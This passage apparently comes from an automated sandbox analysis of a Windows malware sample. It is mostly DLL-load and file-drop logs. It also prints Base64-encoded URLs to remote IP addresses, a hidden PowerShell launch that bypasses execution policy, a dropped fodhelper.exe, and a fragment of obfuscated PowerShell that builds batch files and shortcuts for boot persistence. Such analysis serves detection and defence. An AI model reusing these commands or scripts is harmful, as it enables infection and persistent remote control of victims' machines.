            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: jli.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: jli.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: version.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: wldp.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: propsys.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: profapi.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: edputil.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: netutils.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: slc.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: userenv.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: sppc.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\shutdown.exeSection loaded: shutdownext.dllJump to behavior
            Source: C:\Windows\System32\shutdown.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\shutdown.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
            Source: _kjfech8_V.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\Public\computer_kjfech8_V.cmd
            Source: _kjfech8_VEX.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\_kjfech8_V\_kjfech8_V.exe
            Source: _kjfech8_VAT.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\_kjfech8_V\_kjfech8_V.exe
            Source: _kjfech8_VAA.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\_kjfech8_V\_kjfech8_Vi7.exe
            Source: _kjfech8_Vy.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\Public\computer_kjfech8_Vy.cmd
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeFile opened: C:\_kjfech8_V\MSVCR100.dllJump to behavior
            Source: Binary string: msvcr100.i386.pdb source: _kjfech8_Vi7.exe, _kjfech8_Vi7.exe, 0000000B.00000002.29808351670.000000006FD71000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30385075264.0000014C514D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb> source: powershell.exe, 00000014.00000002.30388421204.0000014C517A7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u92\6642\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: _kjfech8_Vi7.exe, 00000009.00000000.29777323121.0000000000D02000.00000002.00000001.01000000.00000008.sdmp, _kjfech8_Vi7.exe, 0000000B.00000000.29782413626.0000000000D02000.00000002.00000001.01000000.00000008.sdmp, _kjfech8_Vi7.exe, 0000000B.00000002.29804465764.0000000000D02000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000014.00000002.30385075264.0000014C514D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30388421204.0000014C517A7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30388421204.0000014C51760000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000014.00000002.30390098625.0000014C517D6000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aAB0AHQAcAA6AC8ALwA2ADIALgA3ADIALgAzAC4AMgAxADAALwBsAGQAaAB0AC8AaQBuAGQAZQB4AC4AcABoAHAA')))) $GlobalListStr = [
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aAB0AHQAcAA6AC8ALwA4ADYALgAzADgALgAyADEANwAuADEANgA3AC8AcABzADEALwBpAG4AZABlAHgALgBwAGgAcAA=')))) $GlobalListStr
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"
            Source: fodhelper.exe.4.drStatic PE information: 0xF07D2A93 [Fri Nov 8 07:38:59 2097 UTC]
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDFB67F _encoded_null,LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,9_2_6FDFB67F
            Source: fodhelper.exe.4.drStatic PE information: section name: .imrsiv
            Source: jli.dll.4.drStatic PE information: section name: .didata
            Source: jli.dll.4.drStatic PE information: section name: .debug
            Source: WebView2Loader.txt.4.drStatic PE information: section name: .00cfg
            Source: WebView2Loader.txt.4.drStatic PE information: section name: .voltbl
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_00D01695 push ecx; ret 9_2_00D016A8
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD72D80 push eax; ret 9_2_6FD72D9E
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD80995 push ecx; ret 9_2_6FD809A8
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD9A6AA push EF3FEFD4h; iretd 9_2_6FD9A6B1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD8BF60 push ecx; ret 9_2_6FD8BF73
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD99CD8 pushad ; iretd 9_2_6FD99CE6
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_00D01695 push ecx; ret 11_2_00D016A8
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD72D80 push eax; ret 11_2_6FD72D9E
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD80995 push ecx; ret 11_2_6FD809A8
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD9A6AA push EF3FEFD4h; iretd 11_2_6FD9A6B1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD8BF60 push ecx; ret 11_2_6FD8BF73
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD99CD8 pushad ; iretd 11_2_6FD99CE6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF443900BD pushad ; iretd 20_2_00007FFF443900C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF444662FB push esi; ret 20_2_00007FFF44466307
            Source: MSVCR100.txt.4.drStatic PE information: section name: .text entropy: 6.90903234258047
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\fodhelper.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\exe.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\_kjfech8_V.exe (copy)Jump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\MSVCR100.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\i7.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\MSVCR100.dll (copy)Jump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\WebView2Loader.dll (copy)Jump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\WebView2Loader.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\jli.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\_kjfech8_Vi7.exe (copy)Jump to dropped file

            Boot Survival

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.exe del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.cmd ${/_//_//_/} = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\\\\\\\\\\\\\\\\\_}${GER}.${_/|\_/|////\__|/_|\\_}" ${\\\\__/////////} = "@Echo off`r`n"${\\\\__/////////} += "Setlocal EnableExtensions`r`n" ${\\\\__/////////} += "Setlocal EnableDelayedExpansion`r`n" ${\\\\__/////////} += "cd %SystemRoot%\System32`r`n" ${\\\\__/////////} += "Set /P ${_\\\\\\/|\_/|/\\\___\\\\/|_}=<`"${//////////____zz//}${GER}`"`r`n"${\\\\__/////////} += "set chars=0123456789abcdefghijklmnopqrstuvwxyz`r`n"${\\\\__/////////} += "for /L %%N in (10 1 36) do (`r`n"${\\\\__/////////} += "for /F %%C in (`"!chars:~%%N,1!`") do (`r`n"${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:%%N=%%C!`"`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n" ${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:@=!`"`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n" ${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:`"=!`"`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += "%${_\\\\\\/|\_/|/\\\___\\\\/|_}%`r`n" ${\\\\__/////////} | Set-Content ${/_//_//_/}function _____/\_/\/\_/\/=\\\\\\\\\\/////{ Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/}); try{ ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==}) ${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}" ${/=\/\__/=\/=\/=\_}.Arguments = 
